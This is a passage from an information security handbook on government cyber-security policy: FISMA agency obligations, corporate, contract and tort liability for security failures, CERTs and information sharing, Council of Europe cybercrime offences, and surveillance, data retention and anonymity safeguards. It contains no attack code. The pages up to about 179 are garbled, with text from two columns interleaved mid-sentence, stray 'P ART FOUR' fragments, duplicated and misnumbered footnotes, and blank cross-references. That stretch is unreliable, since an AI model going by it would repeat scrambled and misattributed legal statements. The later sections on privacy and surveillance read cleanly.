Any deficiencies o cost-effectively reduce information security risks; in policies, procedures, and practices that are identified o ensure that information security is addressed must be reported to OMB and the Congress.142 throughout the life cycle of each agency information system; and Annually, each agency must have an independent security o ensure compliance with OMB requirements and evaluation performed to determine the effectiveness of security standards. its information security program and practices. Each evaluation must include testing of the effectiveness of ·Subordinate plans for providing adequate informa- information security policies, procedures and practices tion security for networks, facilities, and systems or of a representative subset of the agency's information groups of information systems. systems, and an assessment of compliance with relevant information security policies, procedures, standards, ·Security awareness training for agency personnel, and guidelines.143 contractors, and other users of information systems that support the operations of the agency. FISMA requires the Director of OMB to oversee the development and implementation of all information ·Periodic testing and evaluation (not less than annually) security policies and practices. FISMA also vests authority of the effectiveness of information security policies, in the National Institute of Science and Technology procedures and practices, which includes testing of to develop standards and guidelines for minimum management, operational, and technical controls. information security requirements144 and requires the Director of OMB to oversee agency compliance with ·A process for planning, implementing, evaluating, these requirements and to review at least annually and documenting remedial action to address any agency information security programs. 
The OMB Director P deficiencies in the information security policies, pro- is charged with reporting annually to Congress on the ART cedures, and practices of the agency. agencies' performance.145 ·Procedures for detecting, reporting, and responding to security incidents. FOUR ·Plans and procedures to ensure continuity of operations for information systems that support the operations and assets of the agency. Each agency is required to submit an annual report to the Director of the Office of Management and Budget (OMB, part of the Executive Office of the President) and to Congressional committees on the adequacy and effec- tiveness of information security policies, procedures and 142Id. 143Title 44, United States Code, section 3545. 144Title 40, United States Code, section 11331. 145Title 44, United States Code, section 3543. 174 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 3. While this area of the law is barely emerging even in THE ROLE OF LAW AND GOVERNMENT developed countries, part of the legal and policy debate in POLICY VIS-À-VIS THE PRIVATE any nation concerning cyber-security should include con- SECTOR sideration of how traditional legal concepts apply to the risks and responsibilities of computer security. Traditional Legal Responsibilities Translated to Cyberspace In this section, we discuss the ways in which legal policies of general applicability are being extended to cyber-security. In Chapter 4, we discuss governmental Businesses have an incentive to maintain the security policies that are specifically designed to promote of their information systems because their profitability cyber-security in the private sector. depends on it. In a variety of ways, if a company does not protect itself against cyber failures, it could suffer Laws Regarding Corporate Governance, the losses that directly affect its profitability. 
Cyber-security Registration and sale of Corporate breaches can result in substantial interruption of a com- Securities, and Accounting pany's business and tarnish its reputation. An attack on a corporation's computer network may shut down opera- Under company/corporate law, an entity's officers and tions or result in damage to or loss of information such directors may have a fiduciary obligation to the corpo- as customer data or trade secrets. Any company that ration and its shareholders to use reasonable care in fails to provide security may lose customers to competitors overseeing the corporation's business operations. that do take security seriously. If makers of computers Increasingly, it is being recognized that this duty and software build insecure products, they risk extends to matters of computer security. Some writers losing customers. have noted that where corporate officers and directors are negligent in failing to take appropriate steps to In addition to pure market forces, many legal principles assess the threat of cyber-security breaches and can create incentives for cyber-security.146 Corporations to insist that management protect the corporation are subject to a web of legal responsibilities arising accordingly, the directors may be liable for damages from traditional concepts of corporation or company in lawsuits brought by shareholders.147 law, contracts, and civil liability for intentional or negli- gent infliction of loss, to name a few. Corporations are In the United States, this kind of legal obligation, arising also subject to relatively more modern regulatory obli- from general rules of corporate law (promulgated at the gations related to the registration and sale of securities state level), has been strengthened by federal statutory on public exchanges and to unfair and deceptive trade obligations. The Sarbanes-Oxley Act of 2002 imposes a practices, for example. 
Increasingly, attention is being number of new requirements on the sale of corporate given to how these traditional legal responsibilities securities, prompted in large part by accounting scan- might apply to cyber-security issues. Regulatory agen- dals. Congress determined that cyber-security had cies are already determining by rulemaking or case-by- become vital to the soundness of a corporation's financial case adjudication that regulatory systems of fair trade data. Therefore, Congress included a requirement that a or public disclosure apply to computer security issues as corporation's auditors publicly attest to the security of the well as traditional misconduct or vulnerabilities. In legal corporations' information systems.148 systems where judges have authority to extend general legal concepts to new situations, judges could resolve lawsuits involving cyber-security by deciding that a traditional legal concept (such as negligence or the duties of contractual performance) applies to computer failures. 146See the excellent article by Thomas J. Smedinghoff, "The Developing U.S. Legal Standard for Cyber-security," Baker & McKenzie, Chicago (May 3, 2003), http://www.bmck.com/ecommerce/us%20cyber-security%20standards.pdf 147Benjamin Wright, "The Legal Risks of Computer Pests and Hacker Tools," Password (the ISSA Magazine), Feb. 2002, http://www.tecmetrics.com/legal_risks.htm. 148Sarbanes-Oxley Act of 2002, Pub. Law 107-204. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 175 Also under the law in various companies, publicly traded the company could be subject to a claim for negligence. corporations must undergo annual financial audits by Where a company's computers are used to launch a independent accounts. 
As accountants recognize that cyber attack against a third party, there may be cyber-vulnerabilities may threaten the financial viability potential for tort liability if the company failed to take of a company, accountants increasingly including cyber- widely-accepted measures to prevent its computers from security in the scope of their audits. A number of being hijacked. Where an attack is launched by a com- organizations have developed standards or guidelines pany employee, victims may be able to obtain relief by for use by auditors.149 showing that the defendant company engaged in negligent hiring or supervisory practices.153 Contract Law For now, this is an area of the law that remains Businesses may also have a responsibility under undeveloped, even in the United States, where tort contract law to protect the data of their customers from lawsuits are common for a wide range of injuries. So far, unauthorized access or destruction resulting from a courts have not held that there is a general legal duty cyber-security breach. Applying basic contract law to maintain one's network secure. However, it may be principles in the cyber context, a company that represents just a matter of time before traditional theories of lia- that its system is secure, whether in a service contract bility are applied to the field of computer security. At or a privacy and security promise appearing on its web- such time, courts could find the standard of care for site, could arguably be deemed to have entered into an computer security in industry "best practices," guides agreement with a customer who has agreed to the con- and manuals issued by regulators or trade associations, tract or has proceeded to interact with the company in and standards adopted by self-regulatory bodies.154 reliance on those assurances.150 This company may be subject to claims for breach of contract if the security of customer information is compromised in a cyber attack. 
Companies that offer web-based services may also have contractual responsibilities to consumers to maintain the availability of these services. If a site is rendered inoperable by a denial of service attack, the company may be subject to customer claims for breach of contract.151 P ART Tort Law Theoretically, the legal doctrine of torts (civil liability for the intentional or negligent causing of injury) could FOUR have application to various kinds of computer security failures.152 For example, applying traditional tort theory to the cyber context, if a company fails to take reason- able measures to protect a customer's information from unauthorized disclosure as a result of a cyber-attack, 149See, e.g., the Information Systems Audit and Control Association, http://www.isaca.org. 150See, e.g., Michael Nugent, It Can't Happen Here, Wall Street Technology Association, Ticker, A Technology Magazine For Industry Profession (2003) (Nugent), http://www.wsta.org/publications/articles/0402_article03.html. 151Id 152Margaret Jane Radin, "Distributed Denial of Service Attacks: Who Pays?, http://www.mazunetworks.com/white_papers/radin-print.html; Sarah Scalet, "See You in Court," CIO Magazine, Nov. 1, 2001, http://www.cio.com/archive/110101/court_content.html. 153Id., Michael Nugent, It Can't Happen Here, Wall Street Technology Association, Ticker, A Technology Magazine For Industry Profession (2003), http://www.wsta.org/publications/articles/0402_article03.html. 154As is made clear throughout this handbook, there is a growing body widely accepted computer security standards, ranging from the Organization for Economic Cooperation and Development (OECD) Guidelines for the Security of Information Systems to the information security standards adopted by non- governmental standards bodies. See, e.g., Nugent, supra note ____(43) . 176 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 4. U.S. Commerce Department. 
NIST's mission is to develop GOVERNMENT CYBER-SECURITY and promote measurement, standards, and technology POLICIES to enhance productivity, facilitate trade, and improve the quality of life. Increasingly, governments are recognizing that they NIST's Computer Security Division works to improve need to adopt policies that specifically address the information systems security by: issue of computer security in the private sector. This may include the adoption of legislation imposing cer- ·Raising awareness of IT risks, vulnerabilities, and tain duties on private sector corporations. Experience protection requirements; has shown that tailoring the level of regulatory inter- ·Researching, studying, and advising agencies about vention to the particular facts and circumstances at IT vulnerabilities; hand is a key ingredient to successful regulation.155 With ·Devising techniques for the cost-effective security of this caution in mind, governments are beginning to sensitive Federal systems; impose duties on private sector, without mandating par- ·Developing standards, metrics, tests, and validation ticular technologies or standards. In Europe, responsi- programs to promote, measure, and validate security bility for computer security is imposed across all sectors in systems and services; by the Data Protection Directive.156 In Singapore, the ·Establishing minimum security requirements for government has made computer security a component Federal systems; and of the regulatory requirements for the financial sector, ·Developing guidance to increase secure IT planning, broadly defined. In the United States, in recent years, implementation, management and operation.158 federal legislation has been adopted imposing explicit computer security responsibilities on the banking industry In sharing research publicly, government agencies may and the health care industry.157 We discuss these more need to overcome a tradition of secrecy. 
The normally fully below, but first we emphasize some of the impor- super-secret National Security Agency in the United tant roles the government can play vis-à-vis the private States has posted on its public web site its Security sector without regulation. Recommendation guides.159 Non-regulatory Roles of Government Standards: The government is also an important participant in private sector standards setting processes. There are a number of ways in which government can Standards processes are non-regulatory, voluntary, and directly influence the security of privately owned and consensus-based, but government experts may make operated computer systems. Not all of these policy important contributions, especially if the government options are regulatory; many of the most effective supports its own computer security research. options may be non-regulatory in nature. Awareness, Education, and Capacity-Building: Research: An important role for the government is in Another major non-regulatory role of the government conducting and funding research on computer security. is to educate the public and work with the private The U.S. National Institute of Standards and Technology sector to promote awareness of vulnerabilities and (NIST) is a non-regulatory federal agency within the 155See, Smedinghoff, supra note ___(39). 156Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing of personal data and on the free movement of such data, Official Journal L 281/31, Nov. 23, 1995, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=EN&numdoc=31995L0046&model=guichett. 157Health Insurance Portability and Accountability Act of 1996, Pub. Law 104-191, http://aspe.hhs.gov/admnsimp/pl104191.htm; Financial Services Modernization Act of 1999, Pub. Law 106-102, Nov. 12, 1999, 15 U.S.C. 
Section 6801 et seq., http://www4.law.cornell.edu/uscode/15/6801.html; http://www.ftc.gov/privacy/glbact/. 158NIST's Computer Security Resource Center (CSRC) publishes information on a broad range of security topics, including cryptographic standards and applications, security testing, security research, system certification and accreditation guidelines, return on security investments, small business computer security, and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at http://csrc.nist.gov/publications/index.html. 159National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 177 responses.160 Special studies and reports of the kind seven industry sponsors and the German Government. described above are one means of accomplishing this Multinational structures are being created to promote goal. The European Commission has called on Member information sharing regionally and internationally. States to launch public education and awareness cam- In June 2001, the European Commission issued a paigns, including mass media and efforts targeted at all Communication calling for a strengthening of the CERT stakeholders. Convening of expert bodies and issuance system in Europe and better coordination among the of reports and strategy documents help raise awareness. CERTs operating in Member States.163 In February 2003, Education also includes scholarship and human the Commission took a further step, announcing its resources development programs. The European intent to establish a Network and Information Security Commission has recommended that education systems Agency to build on national efforts regarding cyber- of Member States should give more emphasis to courses security and to serve as a coordinating and advisory focused on computer security. 
entity.164 APEC has launched an initiative for a regional CERT aimed at providing in-country training to enhance Information Sharing: Another important government CERT capabilities in developing countries in the region role is to promote information sharing about computer and to develop CERT guidelines.165 The G8 has created a security vulnerabilities, warnings of new viruses and network of "24x7 contacts" ­ round-the-clock duty attacks, and recommendations on solutions, patches, offices at law enforcement agencies to facilitate infor- and best practices.161 The government may fund such mation sharing and cooperation in criminal investigations information sharing centers, such as the CERT of cybercrimes. Non-G8 nations may participate166. (Computer Emergency Response Team) coordination cen- ters that are being established around the globe. For Alternatively, the government may promote the creation example, the U.S. CERT at Carnegie Mellon University is of privately funded, voluntary information sharing sys- a federally funded research and development center that tems, such as the Information Sharing and Analysis provides assistance in handling computer security inci- Centers (ISACs) that are operating in various forms dents and vulnerabilities, publishing security alerts, around the globe. For instance, the United States has researching long-term changes in networked systems, and established industry ISACs for certain sectors (such as developing security information and training materials.162 the financial services sector, the telecommunications Other countries that have established or are establish- sector, and the electrical power industry), and other ing CERT centers include Malaysia, Japan, Australia, and countries, such as Canada, Germany, Japan, and the Korea. Mcert is a CERT for small and medium sized Netherlands, have ISACs as well. 
The UK is pursuing the P enterprises in Germany, created as a public-private WARP Concept (Warning, Advice & Reporting Point), ART partnership by Germany's ICT Association BITKOM, an initiative to establish a `network' across the UK to FOUR 160Awareness is the first principle in the OECD's computer security guidelines. Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf. The G8 has recommended that countries should raise awareness to facilitate stakeholders' understanding of the nature and extent of their critical informa- tion infrastructure, and the role each must play in protecting them. In addition, the G8 has recommended that countries conduct training to enhance their response capabilities. Presidents' Summary: Meeting of G8 Ministers of Justice and Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm. 161Information sharing has been a major themes of most international initiatives, including those of the G8. OAS and APEC. 158NIST's Computer Security Resource Center (CSRC) publishes information on a broad range of security topics, including cryptographic standards and applications, security testing, security research, system certification and accreditation guidelines, return on security investments, small business computer security, and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at http://csrc.nist.gov/publications/index.html. 162National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. 
163European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM(2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm. 161Information sharing has been a major themes of most international initiatives, including those of the G8. OAS and APEC. 164European Commission, Proposal for a Regulation of the European Parliament and of the Council Establishing the European Network and Information Security Agency, Feb. 11, 2003, COM(2003) 63 final, 2003/0032 (COD), http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf. 165"Protecting Developing Economies from Cyber Attack ­ Assistance to Build Regional Cyber-security Preparedness," APEC Media Release, Mar. 18, 2003, http://www.apecsec.org.sg/whatsnew/press/PressRel_ProtectgFromCyberAttack_180303.html. 166G8, Meeting of Justice and Interior Ministers - Action Plan, Dec. 10, 1997, http://birmingham.g8summit.gov.uk/prebham/washington.1297.shtml. 178 INFORMATION SECURITY AND GOVERNMENT POLICIES provide better and more timely advice and and enforcement efforts, and the preservation and timely warnings relating to electronic attack, and for sharing of electronic data and evidence. Resolution receiving incident reports. 55/63 also recommends educating law enforcement authorities and the general public on cybercrime issues. The government may also form public-private committees or fora for exchange of security-related information. An Substantive Criminal Law Offenses example is the U.S. 
National Security Telecommunications There are various ways to conceptualize cybercrimes, Advisory Committee (NSTAC), which is composed of 30 and various names exist for specific offenses, but in chief executives representing major communications and general, laws addressing cybercrime issues have crystallized network service providers and information technology around four kinds of activity: companies and government officials responsible for national security and emergency communications · Data interception: intentional interception, without systems.167 NSTAC provides industry-based advice to right, of non-public transmissions of computer data. the President on issues and problems related to This covers interception of email of another person, implementing national security and emergency for example, and is aimed at protecting the confi- preparedness communications policy. dentiality of communications. Some legal frameworks already make it a crime to intercept telephone con- Criminal Law versations without legal authorization, for example. This well-known concept in the telecom world could Another way in which the government protects private have analogous application in the cyber context. systems is through the criminal law. International and regional institutions have recommended that every · Data interference: intentional damage to, deletion, nation, as part of the legal framework promoting trust degradation, alteration, or suppression of data in and confidence in cyberspace, should adopt basic criminal someone else's computer without right. This covers, laws against activities that attack the confidentiality, for example, intentionally sending viruses that delete integrity, or availability of computer data and computer files, or hacking a computer and changing or deleting systems.168 The framework of applicable criminal law data, or hacking a web site and changing its appear- comprises both substantive as well as procedural law, ance. 
The element of intent is important to distinguish implicating search and seizure as well as privacy concepts criminal activity from mere production of defective that may have unique application in the cyber context. software or unintentionally forwarding viruses . The UN was perhaps the first international body to · System interference: intentionally causing serious recognize the importance of addressing cybercrime.169 hindrance, without right, to the functioning of a In December 2000 and January 2002, the UN General computer system by inputting, transmitting, damag- Assembly adopted Resolutions 55/63 and 56/121 on ing, deleting, deteriorating, altering, or suppressing Combating the Criminal Misuse of Information computer data. This covers things like denial of Technologies.170 Resolution 55/63 declares that states service attacks or introducing viruses into a system should review their laws to eliminate "safe havens" in ways that interfere with its normal usage. for those who carry out cybercrime. Resolution 55/63 "Serious harm" is an element of this offense that recommends, inter alia, that states take appropriate distinguishes criminal activity from other, ordinary measures to prevent the criminal misuse of information online behavior, such as sending one or just a few technologies, international cooperation in investigation unsolicited emails. 167See http://www.ncs.gov/NSTAC/attf.html 168International bodies recommending adoption of cybercrime laws include the UN, EU, COE, G8, APEC, and OAS. For an extended discussion of the activi- ties and recommendations of these and other international bodies regarding cybercrime, see, Westby Guide, supra note ___. 169In 1995, the UN issued under its International Review of Criminal Policy the United Nations Manual on the Prevention and Control of Computer-Related Crime (1995) http://www.uncjin.org/Documents/EighthCongress.html. 
170UN General Assembly, Resolution 55/63, Combating the criminal misuse of information technologies, Dec. 4, 2000, http://www.unodc.org/pdf/crime/a_res_55/res5563e.pdf ; UN General Assembly, Resolution 56/121, Combating the criminal misuse of information technolo- gies, Jan. 23, 2002, http://www.unodc.org/pdf/crime/a_res_56/121e.pdf . See also UN Resolution 57/239 (2002). Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 179 · Illegal access: intentionally accessing, without right, These would include, for example, sending electronic the computer system of another. It can be thought of mail without it having been first solicited by the recipi- as the cyberspace equivalent of trespass. (Looked at ent; accessing a web page, directly or through hypertext another way, illegal access is an offense against the links; or using "cookies" or "bots" to collect information. confidentiality of stored data and therefore is analo- (Para. 46, 48.)172 gous to illegal interception, which is an offense against the confidentiality of data in transit.) In some Computer-facilitated Crime legal systems, the definition of the crime of illegal access is limited to situations in which confidential Discussions of computer crime often extend into activities information (medical or financial information) is that are not crimes against computers, but are crimes taken, copied or viewed or where there is an intent to facilitated by the use of computers. For example, theft obtain confidential information or where access is and fraud are crimes in virtually every legal system obtained only by defeating security measures. whose laws were crafted in the "offline" world. But theft and fraud can equally take place in the "on-line" The Council of Europe has adopted a Convention that world. 
Similarly, crimes such as infringement of intellec- addresses these points.171 tual property rights or dissemination of child pornogra- phy, also are not limited to computer crimes ­ but they Articles 2-5 of the Council of Europe Convention on are crimes that may be facilitated by use of a computer. Cybercrime address these four basic cybercrimes. However, In many cases, existing criminal sanctions apply to in the Convention itself these provisions are drafted in offenses committed online. A critical analysis of a mul- broad terms that could cover a wide range of common tiplicity of factors would need to be taken into account behavior. The Convention also has an Explanatory Report to assess not only whether existing criminal laws apply that aids in interpreting the Convention. Article 2 of the both online and offline, but also whether special, Convention calls upon states to establish as a criminal separate offenses for computer-related crime or crime offense "when committed intentionally, the access to the facilitated by a computer would be necessary. whole or any part of a computer system without right" (emphasis added). On its face, this provision could Articles 7-10 of the Council of Europe Convention on arguably make it a crime to send an unsolicited email, Cybercrime depart from this principle, and reach more since the sender of an unsolicited email "accesses" the broadly, covering crimes involving the use of a comput- recipient's computer (or the mail server of the recipient's er to engage in conduct that is normally already a crime P ISP) without right. Nations following the Therefore it is offline (i.e., forgery, fraud, and the distribution, produc- ART key in interpreting the Council of Europe Convention on tion or possession of child pornography, and copyright Cybercrime to clarify whether "without right" is meant to infringement to name a few). Adopting special provi- include common activities inherent in the Internet. 
The sions for computer-facilitated offenses may be unneces- Explanatory Report states, "legitimate and common activ- sary in some legal systems and might improperly FOUR ities inherent in the design of networks, or legitimate suggest that a crime committed online is worse than and common operating or commercial practices should the same crime committed offline.173 not be criminalized." (Para. 38.) 171The treaty, ETS no. 185, is online at http://conventions.coe.int/treaty/EN/cadreprincipal.htm along with an extensive Explanatory Report. It is very important that nations looking to the convention as a model also carefully consider the Explanatory Report, which has extensive explanations of the meaning of the treaty's sometimes cryptic provisions. The convention, which has not taken effect as of August 2003, has some positive and some negative elements. The convention is very broad, reaching far beyond computer crime as such. And while it requires signatories to adopt laws giving the govern- ment access to computer data (for all crimes) and while it states that such powers must be subject to procedural safeguards protecting privacy, the treaty fails to specify such procedural safeguards. Accordingly, developing countries should be cautious in approaching the Council of Europe convention as a model. A major section of the treaty aims to require governments to cooperate with other countries seeking to search and seize computers, compel disclo- sure of data stored in computers, and carry out real-time interceptions ­ in all kinds of criminal cases ­ in other countries. It also covers extradition for computer crimes as defined under the treaty. 172Further point of caution: the Explanatory Report also states that the phrase "without right" may refer to conduct undertaken without contractual authority. This interpretation seems unwise, for it could make violations of a service provider's terms of service into a criminal offense. 
173 That said, child pornography, which is internationally condemned, is easily facilitated by computers and governments should be sure that their laws adequately prohibit the production and dissemination of such material, lest they become havens for its production or online hosting. Likewise, protection of intellectual property is one of the important building blocks of cyberlaw.

180 INFORMATION SECURITY AND GOVERNMENT POLICIES

Application of basic criminal law concepts

Nations may also want to consider how common concepts of the criminal law such as "aiding and abetting" or "attempt" apply to cybercrime. Thus, if a law has the concept of an attempted offense, then that concept might apply to cybercrime. For example, launching a virus with intent to disrupt service might be a crime under the concept of intent even if the virus didn't work as intended. Similarly, if a nation's law has the concept of aiding and abetting, that might be applied to cyber-crime, such that one who intentionally produces a virus and provides it to another knowing or intending that it will be used to destroy data or interfere with a system may be guilty of data or network interference caused by the virus even if the virus was introduced into a network by someone else.

Privacy Protections

Consideration of cybercrime often leads to questions about the standards under which the government is authorized to obtain access to the electronic communications and computer data that may constitute evidence of cybercrime and other types of crime. Many countries have procedural laws granting the government investigative powers to access information stored in computers. These include judicial orders for the disclosure of stored data and warrants for the immediate search and seizure of computers and computerized data. Many countries also allow real-time interception of communications and the traffic data or transactional data that shows the origin and destination of communications. A major part of the Council of Europe Convention on Cybercrime requires governments to adopt laws on search and seizure of computer evidence, disclosure to governments of computerized records of any kind, and electronic interception of communications - for all kinds of crimes.

Government seizures or compelled disclosures of data stored in computers and government interceptions of communications and traffic data constitute an intrusion on personal privacy and therefore need to be subject to procedural safeguards.174 As the OECD states in its Guidelines for the Security of Information Systems and Networks, "Security should be implemented in a manner consistent with the values recognized by democratic societies including the freedom to exchange thoughts and ideas, the free flow of information, the confidentiality of information and communication, the appropriate protection of personal information, openness and transparency."175 The European Commission has stated, "Protection of privacy is a key policy objective in the European Union. It was recognized as a basic right under Article 8 of the European Convention on human rights. Articles 7 and 8 of the Charter of Fundamental Rights of the EU also provide the right to respect for family and private life, home and communications and personal data."176 Especially in developing and transitional societies, unregulated government surveillance can seriously undermine trust in the Internet.

UN Resolution 55/63 (December 2000) provides that states, as they adopt laws regarding investigative access to communications and computer data, should protect individual freedoms and privacy. In 1990, the Eighth UN Congress on the Prevention of Crime and the Treatment of Offenders issued a series of recommendations concerning the adoption of investigative procedures, evidentiary rules, forfeiture, and international cooperation in cybercrime investigations.177 In 1995, the UN published its Manual on the Prevention and Control of Computer-Related Crime.178 This extensive document examines a wide range of issues related to crime and technology, including procedural law, substantive criminal law, international cooperation, data protection, security, and privacy.179

174 The right to privacy is recognized as a fundamental human right under the Universal Declaration of Human Rights, the International Covenant on Civil and Political Rights, the European Convention on Human Rights, and the American Convention on Human Rights.

175 http://www.oecd.org/document/42/0,2340,en_2649_201185_15582250_1_1_1_1,00.html

176 European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm.

177 Eighth United Nations Congress on the Prevention of Crime and the Treatment of Offenders, Havana, Aug. 27-Sept. 7, 1990, report prepared by the Secretariat, UN publication, Sales No. E.91.IV.2, chap I. For the text of these recommendations, see United Nations Commission on Crime Prevention and Criminal Justice, Report on the Eighth Session, Apr. 27-May 6, 1999, E/CN.15/1999/12, http://www.un.org/documents/ecosoc/docs/1999/e1999-30.htm.

178 UN, International Review of Criminal Policy - United Nations Manual on the Prevention and Control of Computer-Related Crime, http://www.uncjin.org/Documents/EighthCongress.html.

179 Another valuable resource, the report of the UN Economic and Social Council's Commission on Crime Prevention and Criminal Justice, effectively summarizes UN and other international work in the cybercrime and cyber-security area: Effective measures to prevent and control computer-related crime, E/CN.15/2002/8, Report of the Secretary-General, United Nations, Economic and Social Council, Commission on Crime Prevention and Criminal Justice, Eleventh Session, Vienna, Apr. 16-25, 2002, http://www.unodc.org/pdf/crime/commissions/11comm/8e.pdf.

Likewise, the Council of Europe Convention on Cybercrime explicitly requires that interceptions of communications and searches and seizures for stored data be conducted pursuant to the privacy principles set forth in the European Convention on Human Rights. Article 15 of the Cybercrime Convention provides:

1. Each Party shall ensure that the establishment, implementation and application of the powers and procedures provided for in this Section are subject to conditions and safeguards provided for under its domestic law, which shall provide for the adequate protection of human rights and liberties, including rights arising pursuant to obligations it has undertaken under the 1950 Council of Europe Convention for the Protection of Human Rights and Fundamental Freedoms...and other applicable international human rights instruments, and which shall incorporate the principle of proportionality.

2. Such conditions and safeguards shall, as appropriate in view of the nature of the power or procedure concerned, inter alia, include judicial or other independent supervision, grounds justifying application, and limitation on the scope and the duration of such power or procedure.

Surveillance Standards

The Council of Europe Convention on Cybercrime itself does not spell out specific surveillance procedures that would comply with the European Convention of Human Rights. Those are found instead in the decisions of the European Court of Human Rights (summarized below), as well as in the surveillance laws of countries like Canada and the United States that have strong traditions of an independent judiciary and protection of privacy. Especially in developing and transitional societies, which may not have a fully defined set of rules for searches and seizure and surveillance in the offline world, it is important to give close attention to the development of strong standards for government surveillance in the digital context.

Under most advanced legal systems, interception of electronic communications is permissible, but only in accordance with clear standards in the law, requiring justification and prior independent approval, which in many legal systems means approval by a judge. Governments addressing interception and data access issues must be sure to address the procedural standards for government access to communications and computer data. An emerging body of international experience provides useful guidance. Based upon developing national and international standards,180 it is possible to identify the following procedural safeguards regulating the interception of communications:

· The standards for interception are transparent, fully and clearly spelled out in legislation available to the public, with sufficient precision to protect against arbitrary application and so that citizens are aware of the circumstances and conditions under which public authorities are empowered to carry out such surveillance.
· Approval is obtained from an independent official (preferably a judge),181 based on a written application giving reasons and setting forth facts justifying the intrusion, and the approval should be manifested in a written order.
· Surveillance is limited only to the investigation of specified serious offenses.
· Approval is granted only upon a strong factual showing of reason to believe that the target of the search is engaged in criminal conduct.
· Approval is granted only when it is shown that other less intrusive techniques will not suffice.
· Each surveillance order should cover only specifically designated persons or accounts - generalized monitoring is not permitted.
· The rules are technology neutral - all one-to-one communications are treated the same, whether they involve voice, fax, images or data, wire line or wireless, digital or analog.
· The scope and length of time of the interception are limited, and in no event is the surveillance extended longer than is necessary to obtain the needed evidence.
· The surveillance is conducted in such a way as to reduce the intrusion on privacy to an unavoidable minimum necessary to obtain the needed evidence.
· The enabling legislation describes the use to which seized or intercepted material could be put; information obtained for criminal investigative purposes may not be used for other ends.
· The law specifies procedures for drawing up summary reports for a judge's review and precautions to be taken in order to permit inspection of the recordings by the judge and by the defense.
· In criminal investigations, all those who have been the subject of interception should be notified after the investigation concludes, whether or not charges result.
· Personal redress is provided for violations of the privacy standards.

Many of the same provisions are also applicable to search and seizure orders for computer data.

180 Perhaps the most developed body of international law on communications interception can be found in Europe, where the basic privacy principle in Article 8 of the European Convention of Human Rights has been given greater definition by the European Court of Human Rights (ECHR). The principles outlined here are drawn from the case law of the ECHR. Kopp v. Switzerland, Mar. 25, 1998, 27 EHRR 91; Klass v. Germany, 6 September 1978, 2 EHRR 214; Khan v. U.K., May 12, 2000, Reports of Judgments and Decisions, ECtHR, 2000-V; Halford v. U.K., June 25, 1997, Reports of Judgments and Decisions, ECtHR 1997-III; Huvig v. France, Apr. 24, 1990, 12 EHRR 528; Kruslin v. France, Apr. 24, 1990, 12 EHRR 547.

181 Klass v. Germany, 6 September 1978, 2 EHRR 214 ("The Court considers that, in a field where abuse is potentially so easy in individual cases and could have such harmful consequences for democratic society as a whole, it is in principle desirable to entrust supervisory control to a judge.").

Data Retention and Other Government Design Mandates

A number of developed countries (including the United States) have imposed design mandates on telephone common carriers (and, in some countries, ISPs), requiring that communications networks be designed to support government surveillance. In addition, some countries have adopted, or are debating the adoption of, laws requiring service providers to retain traffic data on all communications for a specified period of time (a mandate referred to as "data retention"). These mandates have been very controversial and have been criticized for threatening the privacy of citizens and the security of networks and for imposing considerable costs on service providers. A fuller consideration of design mandates for surveillance is beyond the scope of this report. However, it should be noted that the Council of Europe Convention on Cybercrime does not impose design mandates, technical standards, or data retention requirements on service providers. The treaty only establishes procedures for preserving, seizing, or accessing whatever data is otherwise available for business purposes, using whatever current technical capabilities companies may have. It does not require changes in technology or business practices.182 The European Union in 2002 adopted a directive on privacy in the communications sphere that permits but does not require member countries to adopt data retention requirements.183

182 Articles 20 and 21 of the Council of Europe convention specifically state that the real-time interception laws required under the convention shall empower competent authorities to "compel a service provider, within its existing technical capability," to collect or record, or to co-operate and assist the competent authorities in the collection or recording of, traffic data and communications content. The Explanatory Report states: "The article does not obligate service providers to ensure that they have the technical capability to undertake collections, recordings, co-operation or assistance. It does not require them to acquire or develop new equipment, hire expert support or engage in costly re-configuration of their systems." Para. 221.

183 Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of privacy in the electronic communications sector (Directive on privacy and electronic communications), Article 4(1), Official Journal L 201/37, July 31, 2002, at 37-47 (replacing EU Directive 97/66/EC), http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=en&numdoc=32002L0058&model=guichett. Also available at http://europa.eu.int/comm/internal_market/privacy/law_en.htm.

Anonymity

The Council of Europe Convention on Cybercrime also recognizes another important privacy right: the legitimacy of anonymous communications. The Explanatory Report makes it clear that the convention does not impose on service providers any obligation to keep records of their subscribers. Thus, under the Convention, a service provider would not be required to register identity information of users of prepaid cards for telephone service, nor is it obliged to verify the identity of subscribers or to resist the use of pseudonyms by users of its services.184 In 2003, the Council of Europe issued a Declaration on Freedom of Communication on the Internet in which it expressly stated, "In order to...enhance the free expression of information and ideas, member states should respect the will of users not to disclose their identity."185 Likewise, the European Commission, in its 2001 Communication on Creating a Safer Information Society, recognized the value of anonymity, stating, "An increasing variety of authentication mechanisms is required to meet our different needs in the environments in which we interact. In some environments, we may need or wish to remain anonymous."186 Also, in its 2001 Communication on Network and Information Security, the Commission stated, "authentication must also include the possibility for anonymity, as many services do not need to identify the user..."187

184 Convention, Para. 181.

